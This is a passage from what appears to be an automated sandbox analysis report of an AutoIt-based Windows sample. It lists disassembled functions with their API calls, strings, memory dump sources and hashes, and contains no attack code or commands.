Opcode Fuzzy Hash: 5de41a997f1e36b761729fb3c206eb54879ea62fd84a992a050927a3fe06d61b
Instruction Fuzzy Hash: 45110A79901218FFDB11DBA5CC85F9DBB78EB48710F204095E910B7250DA716E15DB94

Function 00C61290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623

DefDlgProcW.USER32(?,00000020,?), ref: 00C612D8
GetClientRect.USER32(?,?), ref: 00C9B5FB
GetCursorPos.USER32(?), ref: 00C9B605
ScreenToClient.USER32(?,?), ref: 00C9B610

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 83b43327e95461f525dbb8e3d64ec9c35e5cd09a11ff30bd3eb043165a1cfcbd
Instruction ID: 65912733022456f2d32409eecdc3716b8cb5ad028746655c80a52265dda738d5
Opcode Fuzzy Hash: 83b43327e95461f525dbb8e3d64ec9c35e5cd09a11ff30bd3eb043165a1cfcbd
Instruction Fuzzy Hash: 20115835901459AFCB20DF99D8D9ABE77B8EB05301F040455FA01E7240C730BA529BA5

Function 00CC1142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CBFCED,?,00CC0D40,?,00008000), ref: 00CC115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00CBFCED,?,00CC0D40,?,00008000), ref: 00CC1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CBFCED,?,00CC0D40,?,00008000), ref: 00CC118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00CBFCED,?,00CC0D40,?,00008000), ref: 00CC11C1

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: ea57552197cf39ec9a494a5f4008bb29120bc3336fa32a00cdc568b631c0da7b
Instruction ID: bc5de0e45e3958848795e5b4305a57fbef3f35c889a6916906174f5c46e85ccd
Opcode Fuzzy Hash: ea57552197cf39ec9a494a5f4008bb29120bc3336fa32a00cdc568b631c0da7b
Instruction Fuzzy Hash: DF113C31D0061DEBCF009FA6D898BEEBB78FF0A711F094059EE41B6241CB749691CBA5

Function 00CBD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00CBD84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00CBD864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00CBD879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00CBD897

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 9098db1dc21503bfbaafca84a9252dfb090ba217e6218c8cf35da71cab4cf30e
Instruction ID: 4c204b2b479701265dfc03d245187c1fcaa024f3d44d320e5a4595107006a99a
Opcode Fuzzy Hash: 9098db1dc21503bfbaafca84a9252dfb090ba217e6218c8cf35da71cab4cf30e
Instruction Fuzzy Hash: D5115E75605704DBE3208F51EC48F96BBBCEB00B01F10856DA516D6090E7B2E649DBE1

Function 00C96FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00C96FDB

Part of subcall function 00C976C2: __fltout2.LIBCMT ref: 00C976EB

__cftog_l.LIBCMT ref: 00C97001
__cftoe_l.LIBCMT ref: 00C97033

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 47013248a3f8f6cbbdaf640a90b0109b82d0f2f081fc843b01cd407d9125d855
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: E6018C3205A14ABBCF125F84CC4ACEE3F62BB18350F488615FE2858430C236CAB1AB81

Function 00CEB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00CEB2E4
ScreenToClient.USER32(?,?), ref: 00CEB2FC
ScreenToClient.USER32(?,?), ref: 00CEB320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CEB33B

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: ba1608767771362e1550280c19aca8439394610c1e75ac0cef7ba7e5066142e0
Instruction ID: 1eee888a4b33dd29dfff5bf10491a78ad1721641e76235f1eee9e81ef5f79e5c
Opcode Fuzzy Hash: ba1608767771362e1550280c19aca8439394610c1e75ac0cef7ba7e5066142e0
Instruction Fuzzy Hash: 481143B9D00249EFDB41CFA9D884AEEFBB9FB08310F108166E914E3220D735AA558F50

Function 00CEB635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CEB644
_memset.LIBCMT ref: 00CEB653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D26F20,00D26F64), ref: 00CEB682
CloseHandle.KERNEL32 ref: 00CEB694

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 6d040088b9a98154605205d37a74f34877f324e46606264a9bb241f69a81266e
Instruction ID: 498d4edcda2e2959ca02b67a424d88791149718cbdfd5f3b5684468ce1d5e7ab
Opcode Fuzzy Hash: 6d040088b9a98154605205d37a74f34877f324e46606264a9bb241f69a81266e
Instruction Fuzzy Hash: 94F054B25403507AE6102B617D45F7B3A9CEF14355F004021BB08D52A5D7718C01C7B8

Function 00CC6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00CC6BE6

Part of subcall function 00CC76C4: _memset.LIBCMT ref: 00CC76F9

_memmove.LIBCMT ref: 00CC6C09
_memset.LIBCMT ref: 00CC6C16
LeaveCriticalSection.KERNEL32(?), ref: 00CC6C26

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 2e14bf0e7a1a161cc0ff5eb7e5956122a6caf13cb385e730a24cfcfd3cf54fbf
Instruction ID: ed00ee435ae23f79eb28df13b8678075407d51b0af8e83190112dd9c0539b6bd
Opcode Fuzzy Hash: 2e14bf0e7a1a161cc0ff5eb7e5956122a6caf13cb385e730a24cfcfd3cf54fbf
Instruction Fuzzy Hash: 86F03A3A200100ABCF016F55DC85F8ABB29EF45324F048065FE089E227D731A911DBB4

Function 00C62218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00C62231
SetTextColor.GDI32(?,000000FF), ref: 00C6223B
SetBkMode.GDI32(?,00000001), ref: 00C62250
GetStockObject.GDI32(00000005), ref: 00C62258
GetWindowDC.USER32(?,00000000), ref: 00C9BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C9BE90
GetPixel.GDI32(00000000,?,00000000), ref: 00C9BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00C9BEC2
GetPixel.GDI32(00000000,?,?), ref: 00C9BEE2
ReleaseDC.USER32(?,00000000), ref: 00C9BEED

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 572243becc7ca4444be13a017ead3a7d97ab2527f19e9c72fedfcd82ac0296f0
Instruction ID: 992761e0f8cf949ff19016514e8c158c56d3772be35c1959d2d3c6cc675870cf
Opcode Fuzzy Hash: 572243becc7ca4444be13a017ead3a7d97ab2527f19e9c72fedfcd82ac0296f0
Instruction Fuzzy Hash: 18E03932104288EAEF215FA4FC8D7DC3B25EB15332F00836AFA79480E187B14A81DB12

Function 00CB8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00CB871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00CB82E6), ref: 00CB8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00CB82E6), ref: 00CB872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00CB82E6), ref: 00CB8736

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: e4ff322393bd8344cabd1b6847309b7a96002f5e7a0e1f7408077f6106367f24
Instruction ID: ad71c317b055199e0c9c792b831280f4f5b0c3477ea74ba32c9c7f6e8a76599d
Opcode Fuzzy Hash: e4ff322393bd8344cabd1b6847309b7a96002f5e7a0e1f7408077f6106367f24
Instruction Fuzzy Hash: 88E086366122529BD7205FB06D8CB9E3BACEF50795F15882CB245DE050DA748546C750

Function 00CBB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00CBB4BE

Strings

AutoIt3GUI, xrefs: 00CBB436
Container, xrefs: 00CBB43B

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: fd1acbd176a2e47c245bb4b3a41a6ac59b23b39e08e898ccf947341e55c57c56
Instruction ID: 4bfb43acbd28273d364900c060b47a275f319bf0fd4383c2759889d136e072ed
Opcode Fuzzy Hash: fd1acbd176a2e47c245bb4b3a41a6ac59b23b39e08e898ccf947341e55c57c56
Instruction Fuzzy Hash: 5C912970600601AFDB64DF64C884AAAB7F5FF49710F20856DE94ACB2A1DBB1ED45CB60

Function 00CCAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7FC86: _wcscpy.LIBCMT ref: 00C7FCA9

Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC

__wcsnicmp.LIBCMT ref: 00CCB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00CCB0F6

Strings

LPT, xrefs: 00CCB027

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 490f51a4e90bbc358b57f4cb745d1a2153fa9d69019c06a464c0a9fb8a60ece9
Instruction ID: 7df9fae26c5961eee129045a27b6cfd30390123fe1148d174b9cc6a665de6be3
Opcode Fuzzy Hash: 490f51a4e90bbc358b57f4cb745d1a2153fa9d69019c06a464c0a9fb8a60ece9
Instruction Fuzzy Hash: 77617EB5A00219EFCB14DF94C892FAEB7B8EF08310F14406DF916AB291DB70AE44DB50

Function 00C72957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00C72968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00C72981

Strings

@, xrefs: 00C72975

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 41ef0c9da6dd0f3b7b430d56451209de24e07048fa0a04e8adf4827fd7620a9a
Instruction ID: 90e528c9cd0859b0b27e2a40f0531da41b80f81a5dce3d3880c9713be7b492ef
Opcode Fuzzy Hash: 41ef0c9da6dd0f3b7b430d56451209de24e07048fa0a04e8adf4827fd7620a9a
Instruction Fuzzy Hash: 8C5138714187449BD320EF10D886BAFBBECFB89344F41895DF2D8821A1DF318569DB66

Function 00CC9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00C64F0B: __fread_nolock.LIBCMT ref: 00C64F29

_wcscmp.LIBCMT ref: 00CC9824
_wcscmp.LIBCMT ref: 00CC9837

Strings

FILE, xrefs: 00CC9770

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: cb94c7a64a2aed19557076a5e2b6d98b39eb0629c58ce3764ecf84fd134bacaa
Instruction ID: 9d52256f86321f7563014acc562f435f7f24fef5ccab5b39e42f95e5472d0bfe
Opcode Fuzzy Hash: cb94c7a64a2aed19557076a5e2b6d98b39eb0629c58ce3764ecf84fd134bacaa
Instruction Fuzzy Hash: A041C671A00209BADF249AE4CC8AFEFBBBDDF85714F000469F904A7181DA71AA059B65

Function 00CD258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CD259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00CD25D4

Strings

|, xrefs: 00CD25A5

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 8498b80604b78a0ceb76e45c90d1c6fb70401ac4579a9c8b92df5dbaf47ded11
Instruction ID: fda1abc1e236158ad516ac6f2187267dd52ba038d294d059b1b1b1bea252c3c6
Opcode Fuzzy Hash: 8498b80604b78a0ceb76e45c90d1c6fb70401ac4579a9c8b92df5dbaf47ded11
Instruction Fuzzy Hash: 3A310C71800119EBCF11EFA1CC85EEEBFB8FF18314F10015AF915A6265EB319956EB60

Function 00CE7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00CE7B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CE7B76

Strings

', xrefs: 00CE7ACA

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 5f2fd28c19ae21dd6234a2fd9bca4a9bd1e5a8255926e91994527e927ed457d9
Instruction ID: c63ea74c5a10ebe3e45a11f202dcd96f5bb0173213970fca36567a480b85d137
Opcode Fuzzy Hash: 5f2fd28c19ae21dd6234a2fd9bca4a9bd1e5a8255926e91994527e927ed457d9
Instruction Fuzzy Hash: 74413B74A043499FDB14CF65D980BEABBB9FF08300F10116AE904EB341E770AA51DF90

Function 00CE6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00CE6B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CE6B53

Strings

static, xrefs: 00CE6AB3

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 0d3f0456482a32a9b750a56e4f9abbb319d34886a314913c185b6d6b681bc8a9
Instruction ID: df281babce02f4eeeaec1c720285293d1dcb895df6c128f9b84eb13bf70ddd0a
Opcode Fuzzy Hash: 0d3f0456482a32a9b750a56e4f9abbb319d34886a314913c185b6d6b681bc8a9
Instruction Fuzzy Hash: 3A31BE71210244AFDB109F25CC81BFB73A9FF58760F108629F9A9D7190DB30AC81E760

Function 00CC28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CC294C

Strings

0, xrefs: 00CC290A

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 41ed8bdd48c414354ae5db515a02cdd284a417cf1a8e13f5469502890bddbfb2
Instruction ID: b2c4e1a0e11d0346c87b775d8ad6ca3da57eb5bcfe690c67aba02619bc5d5156
Opcode Fuzzy Hash: 41ed8bdd48c414354ae5db515a02cdd284a417cf1a8e13f5469502890bddbfb2
Instruction Fuzzy Hash: FB31F631600305EFEB24EF58DC85FAEBBF8EF45354F14002DE995A61A0D7709A84DB51

Function 00CD39E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00CD3A66

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

Strings

, $, xrefs: 00CD3AA6
AUTOITCALLVARIABLE%d, xrefs: 00CD3A58

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
